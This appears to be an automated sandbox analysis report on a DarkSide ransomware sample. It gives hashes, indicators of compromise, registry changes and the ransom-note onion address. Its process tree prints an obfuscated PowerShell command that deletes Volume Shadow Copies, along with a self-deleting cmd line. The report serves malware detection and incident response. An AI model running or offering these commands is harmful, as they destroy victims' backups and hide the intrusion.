Analysis
-
max time kernel
26s -
max time network
25s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
17-05-2021 14:07
Static task
static1
Behavioral task
behavioral1
Sample
sage2.donotopen.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
sage2.donotopen.exe
Resource
win10v20210408
General
-
Target
sage2.donotopen.exe
-
Size
59KB
-
MD5
7be33b01e9cb99c6e23ae3b02f384a2c
-
SHA1
1f8a236ceafc44eea0c117b9d276d556e3fe53e2
-
SHA256
b70a184f36903de934b93c5118561ddb1c3747e365575f92682ef09fbb48d5f8
-
SHA512
c053fe23f5b25127bfe17d7eabad31aa7c3d696d78373e90d8ced9182598c4315fd0cb02aec12efee120996874894a0ef56671d3db4adedfcccb0b80c4b1c154
Malware Config
Extracted
C:\\README.341d6443.TXT
darkside
http://darksidfqzcuhtk2.onion/VFBTTQ0UZGCGIMG4WZLMO06HUN6ZQHEF4AY2K88X4GZJQOT106I95CADXOD0MZ39
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
sage2.donotopen.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\MergeProtect.tif.341d6443 sage2.donotopen.exe File renamed C:\Users\Admin\Pictures\SelectRead.crw => C:\Users\Admin\Pictures\SelectRead.crw.341d6443 sage2.donotopen.exe File opened for modification C:\Users\Admin\Pictures\ConnectSet.crw.341d6443 sage2.donotopen.exe File renamed C:\Users\Admin\Pictures\DenyRequest.png => C:\Users\Admin\Pictures\DenyRequest.png.341d6443 sage2.donotopen.exe File opened for modification C:\Users\Admin\Pictures\DenyRequest.png.341d6443 sage2.donotopen.exe File opened for modification C:\Users\Admin\Pictures\SelectPop.raw.341d6443 sage2.donotopen.exe File opened for modification C:\Users\Admin\Pictures\SelectRead.crw.341d6443 sage2.donotopen.exe File renamed C:\Users\Admin\Pictures\ConnectSet.crw => C:\Users\Admin\Pictures\ConnectSet.crw.341d6443 sage2.donotopen.exe File renamed C:\Users\Admin\Pictures\MergeProtect.tif => C:\Users\Admin\Pictures\MergeProtect.tif.341d6443 sage2.donotopen.exe File renamed C:\Users\Admin\Pictures\SelectPop.raw => C:\Users\Admin\Pictures\SelectPop.raw.341d6443 sage2.donotopen.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2840 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
sage2.donotopen.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\341d6443.BMP" sage2.donotopen.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\341d6443.BMP" sage2.donotopen.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies Control Panel 1 IoCs
Processes:
sage2.donotopen.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallpaperStyle = "10" sage2.donotopen.exe -
Modifies registry class 5 IoCs
Processes:
sage2.donotopen.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443 sage2.donotopen.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443\ = "341d6443" sage2.donotopen.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon sage2.donotopen.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443 sage2.donotopen.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\341d6443.ico" sage2.donotopen.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exesage2.donotopen.exepid process 1616 powershell.exe 1616 powershell.exe 788 sage2.donotopen.exe 788 sage2.donotopen.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
sage2.donotopen.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 788 sage2.donotopen.exe Token: SeSecurityPrivilege 788 sage2.donotopen.exe Token: SeTakeOwnershipPrivilege 788 sage2.donotopen.exe Token: SeLoadDriverPrivilege 788 sage2.donotopen.exe Token: SeSystemProfilePrivilege 788 sage2.donotopen.exe Token: SeSystemtimePrivilege 788 sage2.donotopen.exe Token: SeProfSingleProcessPrivilege 788 sage2.donotopen.exe Token: SeIncBasePriorityPrivilege 788 sage2.donotopen.exe Token: SeCreatePagefilePrivilege 788 sage2.donotopen.exe Token: SeBackupPrivilege 788 sage2.donotopen.exe Token: SeRestorePrivilege 788 sage2.donotopen.exe Token: SeShutdownPrivilege 788 sage2.donotopen.exe Token: SeDebugPrivilege 788 sage2.donotopen.exe Token: SeSystemEnvironmentPrivilege 788 sage2.donotopen.exe Token: SeRemoteShutdownPrivilege 788 sage2.donotopen.exe Token: SeUndockPrivilege 788 sage2.donotopen.exe Token: SeManageVolumePrivilege 788 sage2.donotopen.exe Token: 33 788 sage2.donotopen.exe Token: 34 788 sage2.donotopen.exe Token: 35 788 sage2.donotopen.exe Token: SeDebugPrivilege 1616 powershell.exe Token: SeBackupPrivilege 1644 vssvc.exe Token: SeRestorePrivilege 1644 vssvc.exe Token: SeAuditPrivilege 1644 vssvc.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
sage2.donotopen.exedescription pid process target process PID 788 wrote to memory of 1616 788 sage2.donotopen.exe powershell.exe PID 788 wrote to memory of 1616 788 sage2.donotopen.exe powershell.exe PID 788 wrote to memory of 1616 788 sage2.donotopen.exe powershell.exe PID 788 wrote to memory of 1616 788 sage2.donotopen.exe powershell.exe PID 788 wrote to memory of 2840 788 sage2.donotopen.exe cmd.exe PID 788 wrote to memory of 2840 788 sage2.donotopen.exe cmd.exe PID 788 wrote to memory of 2840 788 sage2.donotopen.exe cmd.exe PID 788 wrote to memory of 2840 788 sage2.donotopen.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe"C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\SAGE2D~1.EXE >> NUL2⤵
- Deletes itself
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
dab8d891d3796ee132d648b719db343c
SHA18eab3909265c184a9a26893589836f047591c54c
SHA2567e2ec9da9919c4f541728636bfac5e74405033f0f7e7bd733c3e68d82349f786
SHA512305ca5f6aff09b5d645b5ce1e74b5fe22227fa6d6d70c4ab3dd165b1a140857f929a1727ea341fff063d1dc39756d037d0aac2c10a8ea0f9757ad111edc90d87
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
5fcb6bbfb6b9dfcc7478f6cfa20f8bf0
SHA13c0ac7025e2d9aa30ef10a51313d152307f46dd1
SHA2564a2b89babae45fbedb1c4b80f696fbc89a8b13249789647f55c64cbb878e2a64
SHA512be9c5563f3c7430369359dbb7a548d6135773ae49b11047eb8acb7fa5c849e979456c06a49b27dd0a862ef1886930e7ad3e182e265f43e6cf1bca70874b30fed
-
memory/788-59-0x0000000075551000-0x0000000075553000-memory.dmpFilesize
8KB
-
memory/1616-66-0x000000001AC14000-0x000000001AC16000-memory.dmpFilesize
8KB
-
memory/1616-63-0x000000001AC90000-0x000000001AC91000-memory.dmpFilesize
4KB
-
memory/1616-64-0x0000000002280000-0x0000000002281000-memory.dmpFilesize
4KB
-
memory/1616-62-0x0000000001ED0000-0x0000000001ED1000-memory.dmpFilesize
4KB
-
memory/1616-65-0x000000001AC10000-0x000000001AC12000-memory.dmpFilesize
8KB
-
memory/1616-67-0x0000000001F10000-0x0000000001F11000-memory.dmpFilesize
4KB
-
memory/1616-68-0x000000001C4C0000-0x000000001C4C1000-memory.dmpFilesize
4KB
-
memory/1616-69-0x000000001C590000-0x000000001C591000-memory.dmpFilesize
4KB
-
memory/1616-61-0x000007FEFBC81000-0x000007FEFBC83000-memory.dmpFilesize
8KB
-
memory/1616-60-0x0000000000000000-mapping.dmp
-
memory/2840-72-0x0000000000000000-mapping.dmp